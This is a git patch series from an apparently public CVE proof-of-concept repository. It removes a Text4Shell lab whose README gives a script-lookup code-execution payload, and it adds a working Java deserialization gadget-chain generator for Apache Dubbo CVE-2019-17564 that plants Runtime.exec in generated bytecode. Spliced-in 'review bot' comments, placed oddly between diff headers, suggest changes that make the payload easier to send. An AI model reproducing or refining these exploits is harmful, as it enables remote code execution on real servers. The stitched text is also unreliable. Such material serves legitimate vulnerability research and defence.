b/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml deleted file mode 100644 index f3364260..00000000 
--- a/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2020-1948 -source: https://github.com/txrw/Dubbo-CVE-2020-1948 -info: - name: Dubbo是一个高性能优秀的服务框架。 - severity: CRITICAL - description: | - 此漏洞会影响所有使用2.7.6或更低版本的Dubbo用户。攻击者可以发送具有无法识别的服务名称或方法名称以及一些恶意参数有效负载的 RPC 请求。当恶意参数反序列化时,它会执行一些恶意代码。更多细节可以在下面找到。 - scope-of-influence: - Dubbo 2.5.0-2.5.10 - Dubbo 2.6.0-2.6.7 - Dubbo 2.7.0-2.7.6 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-1948 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-1948 - cwe-id: CWE-502 - cnvd-id: None - kve-id: None - tags: cve2020, Dubbo \ No newline at end of file -- Gitee From fed6b76e5ff483ea06d594c2c9d700acd18f6960 Mon Sep 17 00:00:00 2001 
From: GQ246 Date: Tue, 11 Apr 2023 14:55:54 +0000 Subject: [PATCH 6/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?docker/2022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/cve-2022-42889/Dockerfile | 18 ------ cve/docker/2022/cve-2022-42889/README.md | 61 ------------------- cve/docker/2022/cve-2022-42889/pom.xml | 46 -------------- .../com/levo/dockerexample/DockerApp.java | 11 ---- .../controller/HelloController.java | 30 --------- .../dockerexample/PlaceHolderForTest.java | 5 -- cve/docker/2022/yaml/cve-2022-42889.yaml | 20 ------ 7 files changed, 191 deletions(-) delete mode 100644 cve/docker/2022/cve-2022-42889/Dockerfile delete mode 100644 cve/docker/2022/cve-2022-42889/README.md delete mode 100644 cve/docker/2022/cve-2022-42889/pom.xml delete mode 100644 cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java delete mode 100644 cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java delete mode 100644 cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java delete mode 100644 cve/docker/2022/yaml/cve-2022-42889.yaml diff --git a/cve/docker/2022/cve-2022-42889/Dockerfile b/cve/docker/2022/cve-2022-42889/Dockerfile deleted file mode 100644 index a31999b9..00000000 --- a/cve/docker/2022/cve-2022-42889/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# Use an official OpenJDK runtime as a parent image -FROM openjdk:8-jre-alpine - -# set shell to bash -# source: https://stackoverflow.com/a/40944512/3128926 -RUN apk update && apk add bash - -# Set the working directory to /app -WORKDIR /app - -# Copy the fat jar into the container at /app -COPY /target/text4shell-poc.jar /app - -# Make port 8080 available to the world outside this container -EXPOSE 8080 - -# Run jar file when the container launches -CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file 
diff --git a/cve/docker/2022/cve-2022-42889/README.md b/cve/docker/2022/cve-2022-42889/README.md deleted file mode 100644 index 2452d91e..00000000 --- a/cve/docker/2022/cve-2022-42889/README.md +++ /dev/null @@ -1,61 +0,0 @@ -### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) -------------- - - -1. Maven install to create the fat jar - -``` -mvn clean install -``` - -2. Docker build - -``` -docker build --tag=text4shell . -``` - -3. Docker run - -``` -docker run -p 80:8080 text4shell -``` - -4. Test the app - -``` -http://localhost/text4shell/attack?search= -``` - -5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: - -``` -${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} -``` - -http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D - -6. You can also try using `dns` or `url` prefixes. - -7. Get the container id - -``` -docker container ls -``` - -8. Get into the app - -``` -docker exec -it bash -``` - -9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): - -``` -ls /tmp/ -``` - -10. To stop the container - -``` -docker container stop -``` \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/pom.xml b/cve/docker/2022/cve-2022-42889/pom.xml deleted file mode 100644 index 80084258..00000000 --- a/cve/docker/2022/cve-2022-42889/pom.xml +++ /dev/null 
@@ -1,46 +0,0 @@ - - 4.0.0 - com.levo.dockerexample - docker-java-app-example - jar - 1.0-SNAPSHOT - docker-java-app-example - http://maven.apache.org - - - UTF-8 - UTF-8 - 1.8 - com.levo.dockerexample.DockerApp - - - - org.springframework.boot - spring-boot-starter-parent - 2.1.1.RELEASE - - - - - org.springframework.boot - spring-boot-starter-web - - - org.apache.commons - commons-text - 1.8 - - - - - text4shell-poc - - - org.springframework.boot - spring-boot-maven-plugin - - - - - diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java deleted file mode 100644 index d1d037bf..00000000 --- a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java +++ /dev/null @@ -1,11 +0,0 @@ -package com.levo.dockerexample; - -import org.springframework.boot.SpringApplication; -import org.springframework.boot.autoconfigure.SpringBootApplication; - -@SpringBootApplication -public class DockerApp { - public static void main(String[] args) { - SpringApplication.run(DockerApp.class, args); - } -} diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java deleted file mode 100644 index b4fa1922..00000000 --- a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java +++ /dev/null 
@@ -1,30 +0,0 @@ -package com.levo.dockerexample.controller; - -import java.util.Date; - -import org.apache.commons.text.StringSubstitutor; - -import org.springframework.web.bind.annotation.ResponseBody; -import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.RequestMethod; -import org.springframework.web.bind.annotation.RequestParam; -import org.springframework.web.bind.annotation.RestController; - -@RestController -@RequestMapping("text4shell") -public class HelloController { - - @RequestMapping(value = "/attack", method = RequestMethod.GET) - @ResponseBody - public String attack(@RequestParam(defaultValue="5up3r541y4n") String search) { - StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); - // String pocstring = "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}"; - try{ - String pwn = interpolator.replace(search); - } catch(Exception e) { - System.out.println(e); - } - return "Search results for: " + search; - } - -} diff --git a/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java deleted file mode 100644 index 300beb32..00000000 --- a/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java +++ /dev/null @@ -1,5 +0,0 @@ -package com.levo.dockerexample; - -public class PlaceHolderForTest { - -} diff --git a/cve/docker/2022/yaml/cve-2022-42889.yaml b/cve/docker/2022/yaml/cve-2022-42889.yaml deleted file mode 100644 index 5672cca7..00000000 --- a/cve/docker/2022/yaml/cve-2022-42889.yaml +++ /dev/null 
@@ -1,20 +0,0 @@ -id: cve-2022-42889 -source: - https://github.com/karthikuj/cve-2022-42889-text4shell-docker -info: - name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 - severity: CRITICAL - description: | - Apache Commons Text执行变量插值,允许动态评估和扩展属性。插值的标准格式是“${prefix:name}”,其中“前缀”用于定位执行插值的org.apache.commons.text.lookup.StringLookup的实例。从版本 1.5 开始一直到 1.9,默认查找实例集包括可能导致任意代码执行或与远程服务器联系的插值器。这些查找是: - “脚本” - 使用 JVM 脚本执行引擎 (javax.script) 执行表达式 - “DNS” - 解析 DNS 记录 - “网址” - 从 URL 加载值,包括从远程服务器加载值 如果使用不受信任的配置值,则在受影响版本中使用插值默认值的应用程序可能容易受到远程代码执行或与远程服务器的意外联系。建议用户升级到Apache Commons Text 1.10.0,默认情况下禁用有问题的插值器。 - scope-of-influence: - Docker 1.5-1.10.0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: cve-2022-42889 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None - tags: Docker,cve2022 \ No newline at end of file -- Gitee From b8f796655ac71a0f1fcb85375ef12cfea083ddc3 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Tue, 11 Apr 2023 15:17:17 +0000 Subject: [PATCH 7/8] add CVE-2019-17564 Signed-off-by: GQ246 --- .../2019/CVE-2019-17564/README.md | 29 +++ cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml | 44 ++++ .../main/java/DubboGadget/DubboGadget.java | 49 +++++ .../src/main/java/DubboGadget/Utils.java | 199 ++++++++++++++++++ 4 files changed, 321 insertions(+) create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/README.md create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/DubboGadget.java create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/Utils.java diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/README.md b/cve/apache-Dubbo/2019/CVE-2019-17564/README.md new file mode 100644 index 00000000..7aac4f51 --- /dev/null +++ b/cve/apache-Dubbo/2019/CVE-2019-17564/README.md 
@@ -0,0 +1,29 @@ +# CVE-2019-17564 FastJson + SpringFramework Gadget for Dubbo 2.7.3 +Our full write-up is available at https://www.checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability + +Note that *this is not an exploit*; it is a POC gadget chain used in an exploit used to demonstrate deserialization in scopes containing certain dependencies. + +# Overview +Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564. This code will print, and locally deserialize, a gadget based on dependencies available in the scope of Dubbo 2.7.3, Dubbo Common 2.7.3, and Spring Framework + +# Gadget Chain Structure +1. HashMap.putVal(h,k,v) + a. The result of hashCode(), h, is identical for HotSwappableTargetSource objects, triggering a deeper equals() call on HashMap keys when a second value is inserted +2. HotSwappableTargetSource.equals() +3. XString.equals() +4. com.alibaba.fastjson.JSON.toString() +5. com.alibaba.fastjson.JSON.toJSONString() +6. com.alibaba.fastjson.serializer.MapSerializer.write() +7. TemplatesImpl.getOutputProperties() +8. TemplatesImpl.newTransformer() +9. TemplatesImpl.getTransletInstance() +10. TemplatesImpl.defineTransletClasses() +11. ClassLoader.defineClass() +12. Class.newInstance() +13. MaliciousClass.() +14. Runtime.exec() + +# Credits +Credits are in order to Chris Frohoff and Moritz Bechler for their research and tools (ysoserial and marshalsec), as some of their code was used in the gadget chain, and their research laid the foundation for this exploit. + +Credits are also in order to Checkmarx, who enable this type of research, and our fantastic research group for pitching ideas, reviewing, and bearing the fact that I won't shut up about this type of stuff. diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml b/cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml new file mode 100644 index 00000000..b146abf9 --- /dev/null 
+++ b/cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml @@ -0,0 +1,44 @@ + + + 4.0.0 + + groupId + DubboGadget + 1.0-SNAPSHOT + + + + maven-compiler-plugin + 3.7.0 + + 1.8 + 1.8 + + + + + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-remoting-http + 2.7.3 + + + org.springframework + spring-web + 5.1.9.RELEASE + + + com.nqzero + permit-reflect + 0.4 + + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/DubboGadget.java b/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/DubboGadget.java new file mode 100644 index 00000000..890073f6 --- /dev/null +++ b/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/DubboGadget.java 
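Review bot: The dependencies section of this pom declares only `dubbo`, `dubbo-remoting-http`, `spring-web` and `permit-reflect`, yet the sources added in the same commit import `com.alibaba.fastjson.JSONObject`, `javassist.*` and `org.springframework.aop.target.HotSwappableTargetSource`, none of which is declared here. They presumably reach the compile classpath transitively through `dubbo` 2.7.3, which ties the gadget chain to whatever fastjson, javassist and spring-aop versions that artifact happens to pull in and lets a later Dubbo bump silently change or break the chain. Declare those three artifacts explicitly with pinned versions (the ones resolved by `mvn dependency:tree` against 2.7.3) so the build is reproducible and the versions the chain was verified against are visible in the file. A short XML comment above the dependencies, e.g. `<!-- fastjson/javassist/spring-aop are used directly by Utils.java; keep them pinned to the versions Dubbo 2.7.3 ships -->`, would record the reason.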
@@ -0,0 +1,49 @@
+package DubboGadget;
+
+import com.alibaba.fastjson.JSONObject;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+
+public class DubboGadget {
+ // PoC OS Command to Execute
+ public static String DUBBO_RCE_COMMAND = "calc.exe";
+
+ public static void main(String[] args) throws Exception {
+ byte[] gadgetBytes = RCEObjectPayload(DUBBO_RCE_COMMAND);
+ printGadget(gadgetBytes);
+ // Test gadget locally
+ // execGadget(gadgetBytes);
+ }
+
+ public static byte[] RCEObjectPayload(final String command) throws Exception {
+ Object templates = Utils.createTemplatesImpl(command); // TemplatesImpl gadget chain, which
+ // triggers Runtime.exec() on
+ // TemplatesImpl.newTransformer()
+ JSONObject jo = new JSONObject();
+ jo.put("oops",templates); // If JSONObject.toString() is called,
+ // TemplatesImpl.newTransformer() will be invoked
+ Object o = Utils.makeXStringToStringTrigger(jo); // toString() gadget chain, which
+ // triggers on OIS deserialization
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(o);
+ byte[] gadgetBytes = baos.toByteArray();
+ return gadgetBytes;
+ }
+
+ public static void printGadget(byte[] gadgetBytes) {
+ System.out.println(new String(gadgetBytes));
+ }
+
+ public static void execGadget(byte[] gadgetBytes) throws Exception {
+ // Show serialized gadget in console
+ ByteArrayInputStream bais = new ByteArrayInputStream(gadgetBytes);
+ ObjectInputStream ois = new ObjectInputStream(bais);
+ Object oopsie = ois.readObject();
+ oopsie.toString();
+ }
+}
+
diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/Utils.java b/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/Utils.java
new file mode 100644
index 00000000..12e43a38
--- /dev/null
+++ b/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/Utils.java
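Review bot: `printGadget` converts the serialized object stream to text with `new String(gadgetBytes)`, which decodes arbitrary binary through the platform default charset and substitutes undecodable bytes (the 0xAC 0xED stream header and the embedded class bytes among them), so the console output cannot be pasted back into a request as the payload the `main` method set out to produce. Print an encoding that survives the round trip instead, `System.out.println(Base64.getEncoder().encodeToString(gadgetBytes));` with `import java.util.Base64;`, or write the raw bytes to a file with `Files.write`. The comment `// Show serialized gadget in console` sits on `execGadget` but describes `printGadget`; move it there and give `execGadget` a comment that states its effect, such as `// Deserializes the gadget in this JVM: readObject() fires the chain and DUBBO_RCE_COMMAND runs on this machine`, since the chain's trigger point is otherwise only documented in the README. As a matter of style, the `ObjectOutputStream` and `ObjectInputStream` are never closed; try-with-resources is the idiom for both.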
@@ -0,0 +1,199 @@
+package DubboGadget;
+
+import java.lang.reflect.*;
+
+import com.sun.org.apache.xpath.internal.objects.XString;
+import org.springframework.aop.target.HotSwappableTargetSource;
+import sun.reflect.ReflectionFactory;
+import com.nqzero.permit.Permit;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET;
+
+import java.io.Serializable;
+import java.util.HashMap;
+import java.util.Map;
+
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+ /*
+ * Utility class - based on code found in ysoserial, includes method calls used in
+ * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were
+ * consolidated into a single util class for the sake of brevity; they are otherwise unchanged.
+ *
+ * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger
+ * to create a toString trigger
+ *
+ * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial
+ * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec
+ */
+public class Utils {
+ static {
+ // special case for using TemplatesImpl gadgets with a SecurityManager enabled
+ System.setProperty(DESERIALIZE_TRANSLET, "true");
+
+ // for RMI remote loading
+ System.setProperty("java.rmi.server.useCodebaseOnly", "false");
+ }
+
+ public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
+
+ public static class StubTransletPayload extends AbstractTranslet implements Serializable {
+
+ private static final long serialVersionUID = -5971610431559700674L;
+
+
+ public void transform ( DOM document, SerializationHandler[] handlers ) throws TransletException {}
+
+
+ @Override
+ public void transform ( DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {}
+ }
+
+ // required to make TemplatesImpl happy
+ public static class Foo implements Serializable {
+
+ private static final long serialVersionUID = 8207363842866235160L;
+ }
+
+ public static Object createTemplatesImpl ( final String command ) throws Exception {
+ if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) {
+ return createTemplatesImpl(
+ command,
+ Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"),
+ Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"),
+ Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl"));
+ }
+
+ return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);
+ }
+
+
+ public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory )
+ throws Exception {
+ final T templates = tplClass.newInstance();
+
+ // use template gadget class
+ ClassPool pool = ClassPool.getDefault();
+ pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class));
+ pool.insertClassPath(new ClassClassPath(abstTranslet));
+ final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName());
+ // run command in static initializer
+ // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
+ String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
+ command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
+ "\");";
+ clazz.makeClassInitializer().insertAfter(cmd);
+ // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
+ clazz.setName("ysoserial.Pwner" + System.nanoTime());
+ CtClass superC = pool.get(abstTranslet.getName());
+ clazz.setSuperclass(superC);
+
+ final byte[] classBytes = clazz.toBytecode();
+
+ // inject class bytes into instance
+ Utils.setFieldValue(templates, "_bytecodes", new byte[][] {
+ classBytes, Utils.classAsBytes(Utils.Foo.class)
+ });
+
+ // required to make TemplatesImpl happy
+ Utils.setFieldValue(templates, "_name", "Pwnr");
+ Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance());
+ return templates;
+ }
+
+ public static void setAccessible(AccessibleObject member) {
+ // quiet runtime warnings from JDK9+
+ Permit.setAccessible(member);
+ }
+
+ public static Field getField(final Class clazz, final String fieldName) {
+ Field field = null;
+ try {
+ field = clazz.getDeclaredField(fieldName);
+ setAccessible(field);
+ }
+ catch (NoSuchFieldException ex) {
+ if (clazz.getSuperclass() != null)
+ field = getField(clazz.getSuperclass(), fieldName);
+ }
+ return field;
+ }
+
+ public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
+ final Field field = getField(obj.getClass(), fieldName);
+ field.set(obj, value);
+ }
+
+ public static String classAsFile(final Class clazz) {
+ return classAsFile(clazz, true);
+ }
+
+ public static String classAsFile(final Class clazz, boolean suffix) {
+ String str;
+ if (clazz.getEnclosingClass() == null) {
+ str = clazz.getName().replace(".", "/");
+ } else {
+ str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
+ }
+ if (suffix) {
+ str += ".class";
+ }
+ return str;
+ }
+
+ public static byte[] classAsBytes(final Class clazz) {
+ try {
+ final byte[] buffer = new byte[1024];
+ final String file = classAsFile(clazz);
+ final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file);
+ if (in == null) {
+ throw new IOException("couldn't find '" + file + "'");
+ }
+ final ByteArrayOutputStream out = new ByteArrayOutputStream();
+ int len;
+ while ((len = in.read(buffer)) != -1) {
+ out.write(buffer, 0, len);
+ }
+ return out.toByteArray();
+ } catch (IOException e) {
+ throw new RuntimeException(e);
+ }
+ }
+ public static HashMap makeMap ( Object v1, Object v2 ) throws Exception {
+ HashMap s = new HashMap<>();
+ Utils.setFieldValue(s, "size", 2);
+ Class nodeC;
+ try {
+ nodeC = Class.forName("java.util.HashMap$Node");
+ }
+ catch ( ClassNotFoundException e ) {
+ nodeC = Class.forName("java.util.HashMap$Entry");
+ }
+ Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
+ nodeCons.setAccessible(true);
+
+ Object tbl = Array.newInstance(nodeC, 2);
+ Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
+ Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
+ Utils.setFieldValue(s, "table", tbl);
+ return s;
+ }
+
+ public static Object makeXStringToStringTrigger(Object o) throws Exception {
+ XString x = new XString("HEYO");
+ return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x));
+ }
+}
-- 
Gitee
From 8ca19d65bb2ff8f65478c3cac77c53cf4354dd50 Mon Sep 17 00:00:00 2001
From: GQ246
Date: Tue, 11 Apr 2023 15:27:39 +0000
Subject: [PATCH 8/8] add cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml.
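Review bot: The static initializer at the top of Utils changes two JVM-wide properties as a side effect of merely loading the class — `DESERIALIZE_TRANSLET` to `"true"` and `java.rmi.server.useCodebaseOnly` to `"false"` — and the second relaxes remote class loading for the whole process although nothing in this file uses RMI; the class comment should say so, e.g. `// NOTE: loading this class sets process-wide system properties (see static block); run the generator in its own JVM`. getField returns null when the field exists nowhere in the class hierarchy, so setFieldValue then fails with an uninformative NullPointerException at `field.set`; throwing `new NoSuchFieldException(fieldName)` from setFieldValue when getField returns null names the missing field instead. classAsBytes never closes the InputStream obtained from getResourceAsStream; a try-with-resources around it closes it on every path. The imports of sun.reflect.ReflectionFactory and java.util.Map and the constant ANN_INV_HANDLER_CLASS are unused in this file and can be dropped.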
Signed-off-by: GQ246
---
 .../2019/yaml/ CVE-2019-17564.yaml | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml
diff --git a/cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml b/cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml
new file mode 100644
index 00000000..2ae19468
--- /dev/null
+++ b/cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml
@@ -0,0 +1,21 @@
+id: CVE-2019-17564
+source: https://github.com/Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget
+info:
+ name: Dubbo是一个高性能优秀的服务框架。
+ severity: CRITICAL
+ description: |
+ 不安全的反序列化发生在启用了HTTP远程处理的Dubbo应用程序中。攻击者可以提交包含 Java 对象的 POST 请求,以完全破坏 Apache Dubbo 的提供者实例(如果该实例启用了 HTTP)。此问题影响了 Apache Dubbo 2.7.0 到 2.7.4、2.6.0 到 2.6.7 以及所有 2.5.x 版本。
+ scope-of-influence:
+ Dubbo 2.5.0-2.5.10
+ Dubbo 2.6.0-2.6.7
+ Dubbo 2.7.0-2.7.4
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-17564
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-17564
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
+ tags: cve2019, Dubbo
\ No newline at end of file
-- 
Gitee
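Review bot: The new file's basename carries a leading space (`yaml/ CVE-2019-17564.yaml`, visible in both the diff header and the diffstat), so anything that globs `CVE-*.yaml` or derives the path from `id` will miss this record; rename it to `yaml/CVE-2019-17564.yaml`. `scope-of-influence:` is followed by three indented plain lines without `- ` markers, which YAML folds into the single string `Dubbo 2.5.0-2.5.10 Dubbo 2.6.0-2.6.7 Dubbo 2.7.0-2.7.4` rather than a list of three version ranges; prefix each line with `- ` if a list is intended. The `name` field holds a one-sentence description of Dubbo rather than the name of the vulnerability, which is only characterised under `description`.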